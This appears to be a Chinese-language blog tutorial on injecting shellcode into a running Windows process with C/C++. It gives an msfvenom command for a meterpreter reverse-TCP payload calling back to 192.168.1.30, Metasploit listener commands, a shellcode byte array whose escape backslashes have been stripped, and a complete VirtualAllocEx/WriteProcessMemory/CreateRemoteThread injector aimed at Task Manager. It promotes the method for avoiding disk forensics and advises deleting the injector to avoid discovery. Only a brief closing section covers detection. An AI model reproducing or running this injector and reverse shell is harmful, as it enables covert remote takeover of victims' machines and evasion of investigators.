C/C++ 将ShellCode注入进程内存

C/C++ 将ShellCode注入进程内存

内存注入ShellCode的优势就在于被发现的概率极低，甚至可以被忽略，这是因为ShellCode被注入到进程内存中时，其并没有与之对应的硬盘文件，从而难以在磁盘中取证，但也存在一个弊端由于内存是易失性存储器，所以系统必须一直开机，不能关闭，该攻击手法可以应用于服务器上面，安全风险最小，注入后将注入器删除即可。

1.生成64位ShellCode代码命令

[root@localhost ~]# msfvenom -a x64 --platform Windows 
-p windows/x64/meterpreter/reverse_tcp 
-b 'x00x0b' LHOST=192.168.1.30 LPORT=9999 -f c

2.开启侦听器。

[root@localhost ~]# msfconsole 
[-] ***rting the Metasploit /
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > exploit

2.编译并运行这段代码，将ShellCode注入到系统的任务管理器上，最后别忘了删除注入器，不然被发现打断腿。

#include <stdio.h>
#include <windows.h>unsigned char ShellCode[] =
"x48x31xc9x48x81xe9xc0xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxcex25x3dxafx16x16x69x6fx48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x32x6dxbex4bxe6xfe"
"xa5x6fxcex25x7cxfex57x46x3bx3ex98x6dx0cx7dx73"
"x5exe2x3dxaex6dxb6xfdx0ex5exe2x3dxeex6dxb6xdd"
"x46x5ex66xd8x84x6fx70x9exdfx5ex58xafx62x19x5c"
"xd3x14x3ax49x2ex0fxecx30xeex17xd7x8bx82x9cx64"
"x6cxe7x9dx44x49xe4x8cx19x75xaexc6x70xe8x17xd6"
"x2ex3fxa0x93x64x69x6fxcexaexbdx27x16x16x69x27"
"x4bxe5x49xc8x5ex17xb9x3fx45x6dx25xebx9dx56x49"
"x26xcfxf5xdexf9x5exe9xa0x2ex45x11xb5xe7x17xc0"
"x24x5ex07x6dx0cx6fxbax57xa8xa6xc3x64x3cx6ex2e"
"xf6x1cx9ex82x26x71x8bx1ex53x50xbexbbxfdx65xeb"
"x9dx56x4dx26xcfxf5x5bxeex9dx1ax21x2bx45x65x21"
"xe6x17xc6x28xe4xcaxadx75xaexc6x57x31x2ex96x7b"
"x64xf5x57x4ex28x36x8fx7fx75x2cxfax36x28x3dx31"
"xc5x65xeex4fx4cx21xe4xdcxccx76x50xe9xe9x34x26"
"x70x52x4ex9dx49x25x5bx6fxcex64x6bxe6x9fxf0x21"
"xeex22x85x3cxafx16x5fxe0x8ax87x99x3fxafx31x19"
"xa9xc7xcfx3bx7cxfbx5fx9fx8dx23x47xd4x7cx15x5a"
"x61x4fx68x31xf0x71x26xfcx7ex68x6excex25x64xee"
"xacx3fxe9x04xcexdaxe8xc5x1cx57x37x3fx9ex68x0c"
"x66x5bx27xa9x27x31xe5x75x26xd4x5ex96xafx86xac"
"xfcxeexacxfcx66xb0x2exdaxe8xe7x9fxd1x03x7fx8f"
"x7dx71x26xf4x5exe0x96x8fx9fxa4x0ax62x77x96xba"
"x4bxe5x49xa5x5fxe9xa7x1ax2bxcdxaexafx16x16x21"
"xecx22x35x75x26xf4x5bx58xa6xa4x21x7cxf7x5ex9f"
"x90x2ex74x27xe4x67x49xe9xbcxecx36x25x43xfax5e"
"x95xadx4fx90xacxcbxc5x56x57x30x07xcex35x3dxaf"
"x57x4ex21xe6x3cx6dx0cx66x57xacx31xcbx9dxc0xc2"
"x7ax5ex9fxaax26x47xe2x70x9exdfx5fxe0x9fx86xac"
"xe7xe7x9fxefx28xd5xccxfcxf5xf0xe9xc3xeax97xce"
"x58x15xf7x57x41x30x07xcex65x3dxafx57x4ex03x6f"
"x94x64x87xa4x39x19x59x90x1bx72x64xeexacx63x07"
"x22xafxdaxe8xe6xe9xd8x80x53x31xdaxc2xe7x17xd5"
"x21x46x08x6dxb8x59x63xa2x28x90x29x7dx57xafx4f"
"x5fxaexadx3ex90x9fxf9xe9xc3x69x6f";int main()
{HANDLE Handle;HANDLE remoteThread;PVOID remoteBuffer;DWORD Pid;printf("输入待注入进程PID号：");scanf("%d", &Pid);Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE,Pid);remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);CloseHandle(Handle);return 0;
}

如果你被黑了，可以使用ProcessExplorer监控系统的行为，观察异常的软件，如下可以看出任务管理显然不会存在网络通信，而此处居然有链接进来，明显是被注入Shell了。

然后使用x64DBG附加任务管理器，看是否存在远程线程，挨个找，找到后提取出他的ShellCode代码，进行解密，看能不能找到一些蛛丝马迹。